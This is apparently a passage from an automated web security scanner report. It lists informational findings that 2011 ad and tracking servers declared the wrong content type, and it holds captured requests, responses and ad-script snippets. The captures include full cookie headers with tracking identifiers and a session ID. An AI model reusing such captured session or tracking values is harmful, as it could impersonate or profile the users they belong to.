document.write(unescape("%3CSCRIPT%20language%3D%27JavaScript1.1%27%20SRC%3D%22http%3A//ad.doubleclick.net/adj/N3175.128132.INTERCLICK/B4640114.15%3Bsz%3D300x250%3Bclick%3Dhttp%3A//a1.interclick.com/i
...[SNIP]...

25.5. http://ad.doubleclick.net/pfadx/csmonitor_cim/

Summary

Severity: Information
Confidence: Firm
Host: http://ad.doubleclick.net
Path: /pfadx/csmonitor_cim/

Issue detail

The response contains the following Content-type statement: text/html. The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /pfadx/csmonitor_cim/;secure=false;position=2;ic22=1;ic19=1;ic17=1;ic16=1;ic12=1;ac17=1;ac16=1;ac14=1;ac12=1;ac10=1;pc1=1;pc4=1;ic9=1;ac5=1;ic3=1;ic1=1;ac8=1;ic5=1;AG=1;AK=1;AM=1;AQ=1;ac18=1;ac2=1;ic23=1;pc5=1;ic13=1;sz=24x24;dcmt=text/html;ord=1304955298754? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=csmonitor
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
DCLK_imp: v7;x;240052939;1-0;0;58826896;24/24;41597568/41615355/1;;~aopt=2/1/22/0;~okv=;secure=false;position=2;ic22=1;ic19=1;ic17=1;ic16=1;ic12=1;ac17=1;ac16=1;ac14=1;ac12=1;ac10=1;pc1=1;pc4=1;ic9=1;ac5=1;ic3=1;ic1=1;ac8=1;ic5=1;AG=1;AK=1;AM=1;AQ=1;ac18=1;ac2=1;ic23=1;pc5=1;ic13=1;sz=24x24;dcmt=text/html;~cs=w
Date: Mon, 09 May 2011 15:35:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1217

DoubleClick.onAdLoaded('MediaAlert',{"impression":"http://ad.doubleclick.net/imp;v7;x;240052939;1-0;0;58826896;24/24;41597568/41615355/1;;~aopt=2/1/22/0;~okv=;secure=false;position=2;ic22=1;ic19=1;ic1
...[SNIP]...

25.6. http://adadvisor.net/adscores/g.js

Summary

Severity: Information
Confidence: Firm
Host: http://adadvisor.net
Path: /adscores/g.js

Issue detail

The response contains the following Content-type statement: application/javascript. The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /adscores/g.js?sid=9212076087 HTTP/1.1
Host: adadvisor.net
Proxy-Connection: keep-alive
Referer: http://cdn.interclick.com/ticolscr.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:28 GMT
Connection: close
Server: AAWebServer
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Content-Length: 38
Content-Type: application/javascript

TargusCallback("000", "", "", "", "");

25.7. http://ads.bridgetrack.com/ads_v2/script/btwrite.js

Summary

Severity: Information
Confidence: Firm
Host: http://ads.bridgetrack.com
Path: /ads_v2/script/btwrite.js

Issue detail

The response contains the following Content-type statement: text/html. The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /ads_v2/script/btwrite.js HTTP/1.1
Host: ads.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://ads.bridgetrack.com/a/f/?BT_CON=200&BT_PID=1559799&r=1748565961&click=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBjmhuQgrITdiEBbK9sQf_qZXkD4OtlZQCs5_thR3AjbcB0PalBBABGAEggqrzDjgAUJOPk9T6_____wFgyYaFiYikhBCgAb3klNsDsgETd3d3LnRoZXJlcHVibGljLmNvbboBCjMwMHgyNTBfYXPIAQnaASBodHRwOi8vd3d3LnRoZXJlcHVibGljLmNvbS9ob21lL7gCGMgC2_zMH6gDAdEDrGtosNr1JsXoA5ID6AO1KugD6QfoA7Mp6AO7KvUDAAAARA%26num%3D1%26sig%3DAGiWqtx_GS7Yu0kL0iNYahi3Cfl6RiqLbQ%26client%3Dca-pub-8560941387472259%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BTA144=; ASB164=TX=1304955461&D10=&D6=&D8=&D1=&D3=&Pb=104&A=8&SID=D59645850CE345599D5D3B6C8708440E&D4=&Vn=1423&Ct=0&Pc=0&D5=&S=&Cn=200&Pd=0&D9=&D2=&T=592007&Cr=70715&D7=&W=72461&Tr=72461&Cp=2248&P=1559799&B=164; ATV164=42111d163AJLc68c268c1FJ7Nc38c1CFc251RcI247cc26ODc8ccc26ODcccccccccccccc; BTASES=SID=BB336BA18EEA40CF862F97746AD6F63F; BTA=GUID=4CEEBF00B4224B529E63931FA8A025A6

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400,public
Content-Type: text/html
Expires: Tue, 10 May 2011 15:37:41 GMT
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:37:41 GMT
Connection: close
Content-Length: 49


function BTWrite( s )
{
document.write(s);
}

25.8. http://ads.pointroll.com/PortalServe/

Summary

Severity: Information
Confidence: Firm
Host: http://ads.pointroll.com
Path: /PortalServe/

Issue detail

The response contains the following Content-type statement: text/html. The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /PortalServe/?pid=1233308J95620110310212114&flash=10&time=1|10:35|-5&redir=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBEgMLqgnITYDyDaXRlQfxr83UCKTwo_oBvMa13hvAjbcBABABGAEgjfDlBTgAYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEFmALADLgCGMgC5In4GeACAOoCDjMwMHgyNTBCX01vbmV5kAOkA5gD4AOoAwHoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQB%26num%3D1%26sig%3DAGiWqtyodj_3eco2oOZOH11No0LN9ZNq6g%26client%3Dca-pub-6743622525202572%26adurl%3D$CTURL$&r=0.18015406071208417 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CFJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCeJpJEothAYwPFAxsCAe; PRgo=BCBAAsJvCAAuILCBF-19!BCVBF4FR; PRimp=D9A20400-8E82-28EE-0209-AFE0003E0200; PRca=|AKTy*9203:1|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKTyACY1:1|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GLLp:1|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 15:35:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 4400
Set-Cookie:PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCeJpJEothAYwPFAxsCAeJjUEotmVlODIAEcCDe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=D9A20400-9495-C8E0-0309-8D40011C0203; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKLC*1774:1|AKTy*9203:1|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKLCAA2c:1|AKTyACY1:1|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FKqE:1|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKwo:1|GLLp:1|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FKqEGKwo:1|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...

25.9. http://amch.questionmarket.com/adscgen/sta.php

Summary

Severity: Information
Confidence: Firm
Host: http://amch.questionmarket.com
Path: /adscgen/sta.php

Issue detail

The response contains the following Content-type statement: text/html. The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /adscgen/sta.php?survey_num=887938&site=2320695&code=4862365&ut_sys=eb HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GP=XCLGFbrowser=Cg8JIk24ijttAAAASDs; CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1; ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:40:00 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
DL_S: b202.dl
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 168
Content-Type: text/html

(function(){
if(1!=4){
(new Image).src="http://amch.questionmarket.com/adsc/d887938/3/500004862365/decide.php?ord="+Math.floor((new Date()).getTime()/1000);


}
})();


25.10. http://ar.voicefive.com/b/rc.pli

Summary

Severity: Information
Confidence: Firm
Host: http://ar.voicefive.com
Path: /b/rc.pli

Issue detail

The response contains the following Content-type statement: application/x-javascript. The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction&n=ar_int_p97174789&1304955333231 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:22 2011&prad=253732017&arc=194941149&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1304955323%2E101%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:34 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 42

COMSCORE.BMX.Broker.handleInteraction("");

25.11. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity: Information
Confidence: Firm
Host: http://bs.serving-sys.com
Path: /BurstingPipe/adServer.bs

Issue detail

The response contains the following Content-type statement: text/html. The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2363415&PluID=0&w=300&h=250&ord=60643838482108259&ucm=true&ncu=$$http://pixel.mathtag.com/click/img?mt_aid=60643838482108259&mt_id=112711&mt_adid=100341&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=http://www.mediamath.com$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82MDY0MzgzODQ4MjEwODI1OS8xMTI3MTEvMTAxNzc4LzQvX2ZrTzhjMkc0aHVUREhNaTB2REd4bUZyWW93T240Z0pWR3dZWGlIQ3JTby8/wx5pTXc5IEg4EhGauv_ZowQal6A&price=TcgKYwADH_oK5XtBnK9ekEmaWNoad9RlH1xSlQ&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBkRfnYwrITfq_DMH2lQeQvb3lCdzvj_EB-PbyvBGErMGhDwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi02NzQzNjIyNTI1MjAyNTcyoAHg6pnsA7IBEXd3dy5jc21vbml0b3IuY29tugEKMzAweDI1MF9hc8gBCdoBSWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzcy8yMDExLzA1MDkvR2FzLXByaWNlcy1zdGFydC10by1oZWFkLWRvd26YAugHwAIEyALWwYwO4AIA6gIQMzAweDI1MENfR2VuZXJhbKgDAegD9AnoA5MF6AORA_UDAAQARPUDIAAAAOAEAYAGgIqNvobDucuOAQ%26num%3D1%26sig%3DAGiWqtzdUBy3-sRSj_5-4w3QHutXcJep2g%26client%3Dca-pub-6743622525202572%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ebNewBandWidth_.bs.serving-sys.com=131%3A1303947429371; eyeblaster=BWVal=737&BWDate=40663.344456&debuglevel=&FLV=10.2154&RES=128&WMPV=0; TargetingInfo=0007g420000%5f; C4=; u2=eabf95f8-0142-429e-b9ac-2012a75d64353HU0ag; A3=jlP8aJjE0dpH00001juYhaL6r07Kl00001jBofaIOs07Si00001jAsGaJH602WG00003; B3=9wtb0000000001ur8Whx0000000003uu9oDg0000000001ut98nW0000000001uy

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=jlP8aJjE0dpH00001iRpfaL7W0c9M00001juYhaL6q07Kl00001jAsGaJH602WG00003jBofaIOs07Si00001; expires=Sun, 07-Aug-2011 11:38:52 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=8Whx0000000003uu9wtb0000000001ur9oDg0000000001ut910n0000000001uy98nW0000000001uy; expires=Sun, 07-Aug-2011 11:38:52 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 09 May 2011 15:38:51 GMT
Connection: close
Content-Length: 2338

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

25.12. http://cdn.rpxnow.com/rel/js/28a35f3454bf56715fe8f8b20c5b1fff.js

Summary

Severity: Information
Confidence: Firm
Host: http://cdn.rpxnow.com
Path: /rel/js/28a35f3454bf56715fe8f8b20c5b1fff.js

Issue detail

The response contains the following Content-type statement: text/javascript; charset=utf-8. The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /rel/js/28a35f3454bf56715fe8f8b20c5b1fff.js HTTP/1.1
Host: cdn.rpxnow.com
Proxy-Connection: keep-alive
Referer: http://login.npr.org/openid/embed?token_url=http%3A%2F%2Fwww.npr.org%2Ftemplates%2Freg%2Flogin-janrain-submit.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: Ql95x+cygsoPp4d6d79gHKoDZpYjT4EG0TkYUBAoS6G5cPZduzmk+p3wJjkj+Qyd
x-amz-request-id: E492686DC31D5B48
Date: Mon, 02 May 2011 19:29:13 GMT
Cache-Control: public, max-age=307584000
Last-Modified: Fri, 22 Apr 2011 18:44:20 GMT
ETag: "28a35f3454bf56715fe8f8b20c5b1fff"
Accept-Ranges: bytes
Content-Type: text/javascript; charset=utf-8
Server: AmazonS3
Age: 591041
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 9417e4235ed81e69ea733c3e9923c70af92f1e7abb32dc0c4a70efaee0d0a4b82aabe90c21993c1d
Via: 1.0 c6e272614e0cac48002ff4e64c11f3a7.cloudfront.net:11180 (CloudFront), 1.0 2b0986af7f8d32d3d4b4cf9330702abf.cloudfront.net:11180 (CloudFront)
Connection: keep-alive
Content-Length: 62638

(function(b){var aw,aE,am,t,y,aB,e,z,n,an,J,w,aO,ah,a2,x,at,ak,A,O,aL,ad,ar,aP,U,E,aW,Y,C,u,aM,s,a,aR,L,aD,P,al,T,aT,aV,F,aN,af,G,aF,a0,S,ay,q,av,r,f,aZ,aS,aA,h,V,X,aa,a1,R,aU,aJ,p,ao,aI,d,M,m,ax,Z,aj
...[SNIP]...

25.13. http://contextweb.usatoday.net/asp/Context/ContextWebHandler.ashx

Summary

Severity: Information
Confidence: Firm
Host: http://contextweb.usatoday.net
Path: /asp/Context/ContextWebHandler.ashx

Issue detail

The response contains the following Content-type statement: text/plain; charset=utf-8. The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /asp/Context/ContextWebHandler.ashx?URL=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Fstormcenter%2Fdefault.htm HTTP/1.1
Host: contextweb.usatoday.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/stormcenter/default.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 93
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Cache-Control: private, max-age=2592000
Date: Mon, 09 May 2011 15:36:35 GMT
Connection: close

var ContextWebKeywords="key=cw27+cw296+cw22+cw5+cw461+cw9+cw145;kvcw=27:296:22:5:461:9:145;";

25.14. http://event.adxpose.com/event.flow

Summary

Severity: Information
Confidence: Firm
Host: http://event.adxpose.com
Path: /event.flow

Issue detail

The response contains the following Content-type statement: text/javascript;charset=UTF-8. The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.csmonitor.com%2FBusiness&uid=ZC45X9Axu6NOUFfX_289669&xy=0%2C0&wh=300%2C250&vchannel=69112&cid=172249&iad=1304955321345-89810743578709660&cookieenabled=1&screenwh=1920%2C1200&adwh=300%2C250&colordepth=16&flash=10.2&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3BA3B870213B0BC2343870AF21CD1B45; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 104
Date: Mon, 09 May 2011 15:35:21 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("ZC45X9Axu6NOUFfX_289669");

25.15. http://i.usatoday.net/_common/_scripts/_community/lib/usl.photo.js

Summary

Severity: Information
Confidence: Firm
Host: http://i.usatoday.net
Path: /_common/_scripts/_community/lib/usl.photo.js

Issue detail

The response contains the following Content-type statement: application/x-javascript. The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /_common/_scripts/_community/lib/usl.photo.js HTTP/1.1
Host: i.usatoday.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/stormcenter/default.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Fri, 13 Jul 2007 17:19:19 GMT
Accept-Ranges: bytes
ETag: "80546f271c5c71:0"
Server: Microsoft-IIS/7.5
